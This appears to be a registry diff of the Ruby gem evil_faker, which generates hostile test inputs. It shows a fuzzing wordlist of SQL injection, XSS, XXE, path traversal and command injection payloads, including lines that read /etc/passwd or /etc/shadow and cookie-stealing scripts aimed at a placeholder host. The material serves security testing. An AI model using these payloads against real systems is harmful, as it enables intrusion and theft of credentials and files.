evil_faker 0.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (135) hide show
  1. checksums.yaml +7 -0
  2. data/CHANGELOG.md +62 -0
  3. data/GENERATORS.md +164 -0
  4. data/LICENSE.txt +21 -0
  5. data/NOTICE.md +196 -0
  6. data/README.md +156 -0
  7. data/Rakefile +12 -0
  8. data/lib/evil_faker/base.rb +50 -0
  9. data/lib/evil_faker/data/blns.txt +742 -0
  10. data/lib/evil_faker/data/groups/blns/emoji/emoji.txt +10 -0
  11. data/lib/evil_faker/data/groups/blns/emoji/emoticons.txt +12 -0
  12. data/lib/evil_faker/data/groups/blns/emoji/regional.txt +3 -0
  13. data/lib/evil_faker/data/groups/blns/exploits/cves.txt +4 -0
  14. data/lib/evil_faker/data/groups/blns/exploits/human.txt +1 -0
  15. data/lib/evil_faker/data/groups/blns/exploits/ios.txt +3 -0
  16. data/lib/evil_faker/data/groups/blns/exploits/irc.txt +1 -0
  17. data/lib/evil_faker/data/groups/blns/filenames.txt +14 -0
  18. data/lib/evil_faker/data/groups/blns/injection/command.txt +6 -0
  19. data/lib/evil_faker/data/groups/blns/injection/file_inclusion.txt +2 -0
  20. data/lib/evil_faker/data/groups/blns/injection/interpolation.txt +9 -0
  21. data/lib/evil_faker/data/groups/blns/injection/jinja2.txt +2 -0
  22. data/lib/evil_faker/data/groups/blns/injection/script.txt +236 -0
  23. data/lib/evil_faker/data/groups/blns/injection/server_code.txt +9 -0
  24. data/lib/evil_faker/data/groups/blns/injection/sql.txt +8 -0
  25. data/lib/evil_faker/data/groups/blns/injection/xxe.txt +1 -0
  26. data/lib/evil_faker/data/groups/blns/numeric/numeric.txt +71 -0
  27. data/lib/evil_faker/data/groups/blns/numeric/unicode_numbers.txt +2 -0
  28. data/lib/evil_faker/data/groups/blns/profanity.txt +22 -0
  29. data/lib/evil_faker/data/groups/blns/reserved.txt +19 -0
  30. data/lib/evil_faker/data/groups/blns/rtl.txt +7 -0
  31. data/lib/evil_faker/data/groups/blns/terminal.txt +3 -0
  32. data/lib/evil_faker/data/groups/blns/unicode/accents.txt +4 -0
  33. data/lib/evil_faker/data/groups/blns/unicode/bom.txt +2 -0
  34. data/lib/evil_faker/data/groups/blns/unicode/controls.txt +3 -0
  35. data/lib/evil_faker/data/groups/blns/unicode/font.txt +8 -0
  36. data/lib/evil_faker/data/groups/blns/unicode/lowercase.txt +2 -0
  37. data/lib/evil_faker/data/groups/blns/unicode/quotes.txt +11 -0
  38. data/lib/evil_faker/data/groups/blns/unicode/scripts.txt +2 -0
  39. data/lib/evil_faker/data/groups/blns/unicode/special.txt +4 -0
  40. data/lib/evil_faker/data/groups/blns/unicode/symbols.txt +12 -0
  41. data/lib/evil_faker/data/groups/blns/unicode/trick.txt +5 -0
  42. data/lib/evil_faker/data/groups/blns/unicode/two_byte.txt +10 -0
  43. data/lib/evil_faker/data/groups/blns/unicode/upsidedown.txt +2 -0
  44. data/lib/evil_faker/data/groups/blns/unicode/whitespace.txt +1 -0
  45. data/lib/evil_faker/data/groups/blns/zalgo.txt +5 -0
  46. data/lib/evil_faker/data/groups/fuzzdb/email/invalid.txt +26 -0
  47. data/lib/evil_faker/data/groups/fuzzdb/email/valid.txt +32 -0
  48. data/lib/evil_faker/data/groups/fuzzdb/emoji/emoji.txt +8 -0
  49. data/lib/evil_faker/data/groups/fuzzdb/emoji/emoticons.txt +11 -0
  50. data/lib/evil_faker/data/groups/fuzzdb/emoji/regional.txt +3 -0
  51. data/lib/evil_faker/data/groups/fuzzdb/exploits/ios.txt +1 -0
  52. data/lib/evil_faker/data/groups/fuzzdb/headers/mimetypes.txt +1864 -0
  53. data/lib/evil_faker/data/groups/fuzzdb/headers/protocol.txt +357 -0
  54. data/lib/evil_faker/data/groups/fuzzdb/injection/command.txt +1115 -0
  55. data/lib/evil_faker/data/groups/fuzzdb/injection/directory_traversal.txt +536 -0
  56. data/lib/evil_faker/data/groups/fuzzdb/injection/file_inclusion.txt +906 -0
  57. data/lib/evil_faker/data/groups/fuzzdb/injection/file_upload_bypass.txt +371 -0
  58. data/lib/evil_faker/data/groups/fuzzdb/injection/format_strings.txt +67 -0
  59. data/lib/evil_faker/data/groups/fuzzdb/injection/generic.txt +584 -0
  60. data/lib/evil_faker/data/groups/fuzzdb/injection/integer_overflow.txt +12 -0
  61. data/lib/evil_faker/data/groups/fuzzdb/injection/json.txt +89 -0
  62. data/lib/evil_faker/data/groups/fuzzdb/injection/ldap.txt +35 -0
  63. data/lib/evil_faker/data/groups/fuzzdb/injection/magic_hashes.txt +24 -0
  64. data/lib/evil_faker/data/groups/fuzzdb/injection/nosql.txt +17 -0
  65. data/lib/evil_faker/data/groups/fuzzdb/injection/open_redirect.txt +37 -0
  66. data/lib/evil_faker/data/groups/fuzzdb/injection/rfi.txt +2241 -0
  67. data/lib/evil_faker/data/groups/fuzzdb/injection/script.txt +930 -0
  68. data/lib/evil_faker/data/groups/fuzzdb/injection/server_side_include.txt +78 -0
  69. data/lib/evil_faker/data/groups/fuzzdb/injection/source_disclosure.txt +18 -0
  70. data/lib/evil_faker/data/groups/fuzzdb/injection/sql.txt +661 -0
  71. data/lib/evil_faker/data/groups/fuzzdb/injection/ssrf.txt +56 -0
  72. data/lib/evil_faker/data/groups/fuzzdb/injection/type_confusion.txt +329 -0
  73. data/lib/evil_faker/data/groups/fuzzdb/injection/xpath.txt +13 -0
  74. data/lib/evil_faker/data/groups/fuzzdb/injection/xxe.txt +65 -0
  75. data/lib/evil_faker/data/groups/fuzzdb/routes/debug_params.txt +157 -0
  76. data/lib/evil_faker/data/groups/fuzzdb/routes/directory_indexing.txt +15 -0
  77. data/lib/evil_faker/data/groups/fuzzdb/routes/local_paths.txt +26 -0
  78. data/lib/evil_faker/data/groups/fuzzdb/rtl.txt +5 -0
  79. data/lib/evil_faker/data/groups/fuzzdb/terminal.txt +3 -0
  80. data/lib/evil_faker/data/groups/fuzzdb/unicode/bad_chars.txt +15 -0
  81. data/lib/evil_faker/data/groups/fuzzdb/unicode/special.txt +31 -0
  82. data/lib/evil_faker/data/groups/fuzzdb/unicode/trick.txt +5 -0
  83. data/lib/evil_faker/data/groups/fuzzdb/unicode/two_byte.txt +9 -0
  84. data/lib/evil_faker/data/groups/fuzzdb/unicode/upsidedown.txt +2 -0
  85. data/lib/evil_faker/data/groups/intruder_payloads/filenames.txt +124 -0
  86. data/lib/evil_faker/data/groups/intruder_payloads/injection/command.txt +445 -0
  87. data/lib/evil_faker/data/groups/intruder_payloads/injection/directory_traversal.txt +2578 -0
  88. data/lib/evil_faker/data/groups/intruder_payloads/injection/file_inclusion.txt +698 -0
  89. data/lib/evil_faker/data/groups/intruder_payloads/injection/generic.txt +1401 -0
  90. data/lib/evil_faker/data/groups/intruder_payloads/injection/overflow.txt +36 -0
  91. data/lib/evil_faker/data/groups/intruder_payloads/injection/script.txt +61 -0
  92. data/lib/evil_faker/data/groups/intruder_payloads/injection/server_side_include.txt +18 -0
  93. data/lib/evil_faker/data/groups/intruder_payloads/injection/sql.txt +753 -0
  94. data/lib/evil_faker/data/groups/intruder_payloads/injection/xxe.txt +66 -0
  95. data/lib/evil_faker/data/groups/intruder_payloads/unicode/bad_chars.txt +1 -0
  96. data/lib/evil_faker/data/groups/payloads_all_the_things/headers/cache_deception.txt +1125 -0
  97. data/lib/evil_faker/data/groups/payloads_all_the_things/injection/command.txt +496 -0
  98. data/lib/evil_faker/data/groups/payloads_all_the_things/injection/directory_traversal.txt +22607 -0
  99. data/lib/evil_faker/data/groups/payloads_all_the_things/injection/file_inclusion.txt +4787 -0
  100. data/lib/evil_faker/data/groups/payloads_all_the_things/injection/ldap.txt +60 -0
  101. data/lib/evil_faker/data/groups/payloads_all_the_things/injection/nosql.txt +26 -0
  102. data/lib/evil_faker/data/groups/payloads_all_the_things/injection/open_redirect.txt +305 -0
  103. data/lib/evil_faker/data/groups/payloads_all_the_things/injection/script.txt +2165 -0
  104. data/lib/evil_faker/data/groups/payloads_all_the_things/injection/sql.txt +1354 -0
  105. data/lib/evil_faker/data/groups/payloads_all_the_things/injection/ssti.txt +105 -0
  106. data/lib/evil_faker/data/groups/payloads_all_the_things/injection/xxe.txt +102 -0
  107. data/lib/evil_faker/data/groups/payloads_all_the_things/routes/admin_interfaces.txt +52 -0
  108. data/lib/evil_faker/groups/email.rb +11 -0
  109. data/lib/evil_faker/groups/emoji.rb +12 -0
  110. data/lib/evil_faker/groups/exploits.rb +13 -0
  111. data/lib/evil_faker/groups/filenames.rb +8 -0
  112. data/lib/evil_faker/groups/headers.rb +12 -0
  113. data/lib/evil_faker/groups/injection.rb +35 -0
  114. data/lib/evil_faker/groups/numeric.rb +11 -0
  115. data/lib/evil_faker/groups/profanity.rb +8 -0
  116. data/lib/evil_faker/groups/reserved.rb +8 -0
  117. data/lib/evil_faker/groups/routes.rb +13 -0
  118. data/lib/evil_faker/groups/rtl.rb +8 -0
  119. data/lib/evil_faker/groups/terminal.rb +8 -0
  120. data/lib/evil_faker/groups/unicode.rb +23 -0
  121. data/lib/evil_faker/groups/zalgo.rb +8 -0
  122. data/lib/evil_faker/source_base.rb +30 -0
  123. data/lib/evil_faker/sources/blns.rb +8 -0
  124. data/lib/evil_faker/sources/fuzzdb.rb +8 -0
  125. data/lib/evil_faker/sources/intruder_payloads.rb +8 -0
  126. data/lib/evil_faker/sources/payloads_all_the_things.rb +8 -0
  127. data/lib/evil_faker/version.rb +5 -0
  128. data/lib/evil_faker.rb +13 -0
  129. data/scripts/blns_build_corpus.rb +159 -0
  130. data/scripts/fuzzdb_build_corpus.rb +166 -0
  131. data/scripts/generate_namespaces.rb +87 -0
  132. data/scripts/intruder_payloads_build_corpus.rb +112 -0
  133. data/scripts/payloads_all_the_things_build_corpus.rb +74 -0
  134. data/sig/evil_faker.rbs +4 -0
  135. metadata +181 -0
@@ -0,0 +1,584 @@
1
+ !
2
+ !'
3
+ !@#$%%^#$%#$@#$%$$@#$%^^**(()
4
+ !@#0%^#0##018387@#0^^**(()
5
+ "
6
+ " or "a"="a
7
+ " or "x"="x
8
+ " or 0=0 #
9
+ " or 0=0 --
10
+ " or 1=1 or ""="
11
+ " or 1=1--
12
+ "' or 1 --'"
13
+ ") or ("a"="a
14
+ "<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
15
+ "<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
16
+ "<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
17
+ "<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
18
+ "<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
19
+ "<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
20
+ "<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
21
+ "><script>"
22
+ "><script>alert(1)</script>
23
+ "><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>
24
+ ">xxx<P>yyy
25
+ "\t"
26
+ $NULL
27
+ $null
28
+ %
29
+ %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
30
+ %00
31
+ %00../../../../../../etc/passwd
32
+ %00../../../../../../etc/shadow
33
+ %00/
34
+ %00/etc/passwd%00
35
+ %01%02%03%04%0a%0d%0aADSF
36
+ %08x
37
+ %0A/usr/bin/id
38
+ %0A/usr/bin/id%0A
39
+ %0Aid
40
+ %0Aid%0A
41
+ %0a ping -i 30 127.0.0.1 %0a
42
+ %oa ping -n 30 127.0.0.1 %0a
43
+ %0a id %0a
44
+ %0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a
45
+ %0d
46
+ %0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
47
+ %0d%0aX-Injection-Header:%20AttackValue
48
+ %20
49
+ %20$(sleep%2050)
50
+ %20'sleep%2050'
51
+ %20d
52
+ %20n
53
+ %20s
54
+ %20x
55
+ %20|
56
+ %21
57
+ %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
58
+ %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
59
+ %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
60
+ %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
61
+ %2500
62
+ %250a
63
+ %26
64
+ %27%20or%201=1
65
+ %28
66
+ %29
67
+ %2A
68
+ %2A%28%7C%28mail%3D%2A%29%29
69
+ %2A%28%7C%28objectclass%3D%2A%29%29
70
+ %2A%7C
71
+ %2C
72
+ %2e%2e%2f
73
+ %3C
74
+ %3C%3F
75
+ %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
76
+ %3cscript%3ealert("XSS");%3c/script%3e
77
+ %3cscript%3ealert(document.cookie);%3c%2fscript%3e
78
+ %5C
79
+ %5C/
80
+ %60
81
+ %7C
82
+ %7f
83
+ %99999999999s
84
+ %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
85
+ %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
86
+ %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
87
+ %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
88
+ %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
89
+ %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
90
+ %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
91
+ %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
92
+ %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
93
+ %ff
94
+ %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
95
+ %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
96
+ %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
97
+ %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
98
+ %s%p%x%d
99
+ %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
100
+ %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
101
+ %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
102
+ &
103
+ & id
104
+ & ping -i 30 127.0.0.1 &
105
+ & ping -n 30 127.0.0.1 &
106
+ &#0000060
107
+ &#0000060;
108
+ &#000060
109
+ &#000060;
110
+ &#00060
111
+ &#00060;
112
+ &#0060
113
+ &#0060;
114
+ &#060
115
+ &#060;
116
+ &#10;
117
+ &#10;&#13;
118
+ &#13;
119
+ &#13;&#10;
120
+ &#60
121
+ &#60;
122
+ &#X000003C
123
+ &#X000003C;
124
+ &#X000003c
125
+ &#X000003c;
126
+ &#X00003C
127
+ &#X00003C;
128
+ &#X00003c
129
+ &#X00003c;
130
+ &#X0003C
131
+ &#X0003C;
132
+ &#X0003c
133
+ &#X0003c;
134
+ &#X003C
135
+ &#X003C;
136
+ &#X003c
137
+ &#X003c;
138
+ &#X03C
139
+ &#X03C;
140
+ &#X03c
141
+ &#X03c;
142
+ &#X3C
143
+ &#X3C;
144
+ &#X3c
145
+ &#X3c;
146
+ &#x000003C
147
+ &#x000003C;
148
+ &#x000003c
149
+ &#x000003c;
150
+ &#x00003C
151
+ &#x00003C;
152
+ &#x00003c
153
+ &#x00003c;
154
+ &#x0003C
155
+ &#x0003C;
156
+ &#x0003c
157
+ &#x0003c;
158
+ &#x003C
159
+ &#x003C;
160
+ &#x003c
161
+ &#x003c;
162
+ &#x03C
163
+ &#x03C;
164
+ &#x03c
165
+ &#x03c;
166
+ &#x3C
167
+ &#x3C;
168
+ &#x3c
169
+ &#x3c;
170
+ &LT
171
+ &LT;
172
+ &apos;
173
+ &apos;%20OR
174
+ &id
175
+ &lt
176
+ &lt;
177
+ &lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;
178
+ &lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;
179
+ &lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
180
+ &lt;&gt;&quot;'%;)(&amp;+
181
+ &ltscript&gtalert(document.cookie);&ltscript&gtalert
182
+ &ltscript&gtalert(document.cookie);</script>
183
+ &quot;;id&quot;
184
+ '
185
+ ' (select top 1
186
+ ' --
187
+ ' ;
188
+ ' UNION ALL SELECT
189
+ ' UNION SELECT
190
+ ' or ''='
191
+ ' or '1'='1
192
+ ' or '1'='1'--
193
+ ' or 'x'='x
194
+ ' or (EXISTS)
195
+ ' or 0=0 #
196
+ ' or 0=0 --
197
+ ' or 1 in (@@version)--
198
+ ' or 1=1 or ''='
199
+ ' or 1=1--
200
+ ' or a=a--
201
+ ' or uid like '%
202
+ ' or uname like '%
203
+ ' or user like '%
204
+ ' or userid like '%
205
+ ' or username like '%
206
+ '%20or%201=1
207
+ '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
208
+ '';!--"<XSS>=&{()}
209
+ ') or ('a'='a
210
+ '--
211
+ '; exec master..xp_cmdshell
212
+ '; exec xp_regread
213
+ '; waitfor delay '0:30:0'--
214
+ ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
215
+ ';shutdown--
216
+ '><script>alert(document.cookie);</script>
217
+ '><script>alert(document.cookie)</script>
218
+ 'hi' or 'x'='x';
219
+ 'or select *
220
+ 'sqlattempt1
221
+ '||UTL_HTTP.REQUEST
222
+ '||Utl_Http.request('http://<yourservername>') from dual--
223
+ (
224
+ (')
225
+ (sqlattempt2)
226
+ )
227
+ ))))))))))
228
+ *
229
+ *&apos;
230
+ *'
231
+ *(|(mail=*))
232
+ *(|(objectclass=*))
233
+ */*
234
+ *|
235
+ +
236
+ +%00
237
+ ,@variable
238
+ -
239
+ --
240
+ --';
241
+ --sp_password
242
+ -1
243
+ -1.0
244
+ -2
245
+ -20
246
+ -268435455
247
+ ..%%35%63
248
+ ..%%35c
249
+ ..%25%35%63
250
+ ..%255c
251
+ ..%5c
252
+ ..%bg%qf
253
+ ..%c0%af
254
+ ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
255
+ ..%u2215
256
+ ..%u2216
257
+ ../
258
+ ../../../../../../../../../../../../etc/hosts
259
+ ../../../../../../../../../../../../etc/hosts%00
260
+ ../../../../../../../../../../../../etc/passwd
261
+ ../../../../../../../../../../../../etc/passwd%00
262
+ ../../../../../../../../../../../../etc/shadow
263
+ ../../../../../../../../../../../../etc/shadow%00
264
+ ..\
265
+ ..\..\..\..\..\..\..\..\..\..\etc\passwd
266
+ ..\..\..\..\..\..\..\..\..\..\etc\passwd%00
267
+ ..\..\..\..\..\..\..\..\..\..\etc\shadow
268
+ ..\..\..\..\..\..\..\..\..\..\etc\shadow%00
269
+ .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
270
+ .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
271
+ /
272
+ /%00/
273
+ /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
274
+ /%2A
275
+ /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
276
+ /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
277
+ /&apos;
278
+ /'
279
+ /,%ENV,/
280
+ /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
281
+ /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
282
+ /.../.../.../.../.../
283
+ /../../../../../../../../%2A
284
+ /../../../../../../../../../../../etc/passwd%00.html
285
+ /../../../../../../../../../../../etc/passwd%00.jpg
286
+ /../../../../../../../../../../etc/passwd
287
+ /../../../../../../../../../../etc/passwd^^
288
+ /../../../../../../../../../../etc/shadow
289
+ /../../../../../../../../../../etc/shadow^^
290
+ /../../../../../../../../bin/id|
291
+ /..\../..\../..\../..\../..\../..\../boot.ini
292
+ /..\../..\../..\../..\../..\../..\../etc/passwd
293
+ /..\../..\../..\../..\../..\../..\../etc/shadow
294
+ /./././././././././././etc/passwd
295
+ /./././././././././././etc/shadow
296
+ //
297
+ //*
298
+ /etc/passwd
299
+ /etc/shadow
300
+ /index.html|id|
301
+ 0
302
+ 0 or 1=1
303
+ 00
304
+ 0xfffffff
305
+ 1
306
+ 1 or 1 in (@@version)--
307
+ 1 or 1=1--
308
+ 1.0
309
+ 1; waitfor delay '0:30:0'--
310
+ 1;SELECT%20*
311
+ 1||Utl_Http.request('http://<yourservername>') from dual--
312
+ 2
313
+ 2147483647
314
+ 268435455
315
+ 65536
316
+ :response.write 111111
317
+ ;
318
+ ; ping 127.0.0.1 ;
319
+ ;/usr/bin/id\n
320
+ ;echo 111111
321
+ ;id
322
+ ;id;
323
+ ;id\n
324
+ ;id|
325
+ ;ls -la
326
+ ;system('/usr/bin/id')
327
+ ;system('cat%20/etc/passwd')
328
+ ;system('id')
329
+ ;|/usr/bin/id|
330
+ <
331
+ < script > < / script>
332
+ <!
333
+ <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
334
+ <![CDATA[<script>var n=0;while(true){n++;}</script>]]>
335
+ </foo>
336
+ <<
337
+ <<<
338
+ <<script>alert("XSS");//<</script>
339
+ <>"'%;)(&+
340
+ <?
341
+ <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
342
+ <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
343
+ <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
344
+ <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
345
+ <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
346
+ <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
347
+ <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
348
+ <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
349
+ <IMG DYNSRC="javascript:alert('XSS')">
350
+ <IMG LOWSRC="javascript:alert('XSS')">
351
+ <IMG SRC=" &#14; javascript:alert('XSS');">
352
+ <IMG SRC="jav ascript:alert('XSS');">
353
+ <IMG SRC="jav&#x09;ascript:alert('XSS');">
354
+ <IMG SRC="jav&#x0A;ascript:alert('XSS');">
355
+ <IMG SRC="jav&#x0D;ascript:alert('XSS');">
356
+ <IMG SRC="javascript:alert('XSS')"
357
+ <IMG SRC="javascript:alert('XSS');">
358
+ <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
359
+ <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
360
+ <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
361
+ <IMG SRC=JaVaScRiPt:alert('XSS')>
362
+ <IMG SRC=`javascript:alert("'XSS'")`>
363
+ <IMG SRC=javascript:alert(&quot;XSS&quot;)>
364
+ <IMG SRC=javascript:alert('XSS')>
365
+ <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
366
+ <IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
367
+ <IMG%20SRC='javasc ript:alert(document.cookie)'>
368
+ <IMG%20SRC='javascript:alert(document.cookie)'>
369
+ <foo></foo>
370
+ <name>','')); phpinfo(); exit;/*</name>
371
+ <script>alert("XSS")</script>
372
+ <script>alert(document.cookie)</script>
373
+ <xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
374
+ <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
375
+ <xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
376
+ <xss><script>alert('XSS')</script></vulnerable>
377
+ <youremail>%0aBcc:<youremail>
378
+ <youremail>%0aCc:<youremail>
379
